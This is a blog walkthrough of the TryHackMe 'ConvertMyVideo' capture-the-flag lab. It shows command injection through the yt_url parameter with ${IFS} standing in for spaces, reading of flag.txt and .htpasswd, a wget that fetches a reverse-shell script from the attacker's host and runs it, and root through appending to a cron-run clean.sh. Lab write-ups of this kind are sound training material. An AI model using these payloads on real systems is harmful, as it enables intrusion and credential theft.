TryHackMe — ConvertMyVideo
![](https://savassaygili.com/wp-content/uploads/2020/05/convert-mp3.png)
It’s a very good lab and you can test lots of different topics at the same time;
# I scan with nmap
sudo nmap -sV 10.10.124.59
![](https://miro.medium.com/max/1199/1*Dnmcr5CgWayd95QqwT5CCw.png)
# find web port to open and browse it;
![](https://miro.medium.com/max/905/1*Wxfi_AZZJOmEuuH5Ix_yow.png)
# in parallel I start dirbsearch to find folders
sudo ./dirsearch.py -u http://10.10.124.59 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e js,php,html -x 403,404
![](https://miro.medium.com/max/1635/1*9oB_i0IKdR37SEsCjQhfzA.png)
# so first question answer we find quickly /admin folder our secret folder;
![](https://miro.medium.com/max/1159/1*cNGEN7-PEswxZu0e5iwUWQ.png)
#so I understand basic Authentication and user credential need; I started password attack and also the as same time I started to web application testing
in Burp i start request manipulations ;
![](https://miro.medium.com/max/1834/1*a7sr7tYUK_shzX4dx87koQ.png)
First thing i investigate yt_url part when i write
# |ls
i can execute my command, and after that, i think very simple room to solve;
![](https://miro.medium.com/max/1749/1*eQWniFTDKhqvw3sDF-chHg.png)
#but after that i sent lots of Linux command and take every time to error; so i more create error and search from internet youtube-dl
![](https://miro.medium.com/max/1690/1*WjZFwwfx4IokirrMWkk37Q.png)
# i find source code off youtube_dl
# my test i every time took error about not true parameter and options; so when looked github page i saw valid options
![](https://miro.medium.com/max/1236/1*B10vZGso4Srryicsfdks0A.png)
# and send first option — help over burp
yt_url — help
![](https://miro.medium.com/max/2231/1*Lc6E-EO59w0Lt61808axXg.png)
and bingoo — help options worked for me; all help information i can saw in response ,
![](https://miro.medium.com/max/2665/1*AicySClVAWJM9aemRBa3mA.png)
![](https://miro.medium.com/max/1505/1*jyip58weHjVu_UFe3z3T8w.png)
# after that step i try to send more powerful command which one help to reach my aim, and i spend 1,5 about that;
#main problem simple command like ls, id executed but when i try to execute ls -al every time take syntax errors; so i more focus sent command without space;
#Google best helper me search :
“How to send a command with arguments without spaces?”
and find a true perspective
cat${IFS}file.txt
So using ${IFS} i can send command using without space; but before this job i send all my request burp repeater to more efficiently manipulation;
![](https://miro.medium.com/max/980/1*bT-kB96S-1mEmYEPAm9RZQ.png)
![](https://miro.medium.com/max/818/1*fHMuqji_lLq95kzilVpnCw.png)
#please be careful that part because our parameter must be;
— version;ls${IFS}-al;
note: (- -) in the display looks like — and also you can use all option — help; — execute, — version
![](https://miro.medium.com/max/2429/1*q13Cwp2Ba5S_IUnWKsFbIA.png)
![](https://miro.medium.com/max/774/1*__DYh0fluOsZw_7VfvAwDQ.png)
#so i can access all command that method; now i try to access /admin folder;
yt_url= — version;ls${IFS}/var/www/html/admin${IFS}-al;
![](https://miro.medium.com/max/934/1*j-9deC7ehQZRRORrxIGaOg.png)
![](https://miro.medium.com/max/1139/1*WbutVo441Z4iqFLLldsWJg.png)
# found .htpasswd and flag.txt
for reading flag.txt
yt_url= — version;cat${IFS}/var/www/html/admin/flag.txt;
![](https://miro.medium.com/max/860/1*LkSvHae-BBgeJqrg5rBuNQ.png)
![](https://miro.medium.com/max/1411/1*fIkSpZMizdBtvx4qEP2d9Q.png)
and as the same method when you look to .htpasswd;
yt_url= — version;cat${IFS}/var/www/html/admin/.htpasswd;
you can find user;
![](https://miro.medium.com/max/1531/1*mAvWVSO3y9c17uopBH5lcA.png)
Now i need to ever shell to execute for that reason i prepare bash based reverse shell.sh in my kali computer.
![](https://miro.medium.com/max/641/1*NkcVq2Mn8biBLyZgfual-w.png)
and start my kali
python -m SimpleHTTPServer 8090
and over burp vulnerable machine i try to install that file
yt_url= — version;wget${IFS}http://10.9.32.166:8090/shell.sh;
![](https://miro.medium.com/max/899/1*khgPUkNdw-Ojmy75et248w.png)
— version;chmod${IFS}755${IFS}/var/www/html/shell.sh;
![](https://miro.medium.com/max/844/1*pNPDHX76vNlUubWCbfvyMg.png)
so i installed and give execution permission after that i start in my kali nc to listen;
![](https://miro.medium.com/max/498/1*kJyh27ee00L2yqifsyTfMA.png)
when over burp start shell.sh have shell 🙂
–version;bash${IFS}shell.sh;
![](https://miro.medium.com/max/1473/1*Sn1ISFZQIP0KcWPq9V6kbA.png)
#when i have console i look all method spend 2 hours and last i find one way only change; is there clean.sh script under temp folder; and some cronjob execute it periodically and editable from my self; (how can i know only CTF experience)
so i try to execute that command;
![](https://miro.medium.com/max/1133/1*2ouIPf6_HrzQmPTd4ZTiTA.png)
echo ‘ cat /root/root.txt >root-oldum’ >>clean.sh
and bingo i have root-oldum file as the same directory includes root.txt flag.
![](https://miro.medium.com/max/705/1*sRbPV867GQcEuPipRiRgUA.png)
Super CTF Thank you overjt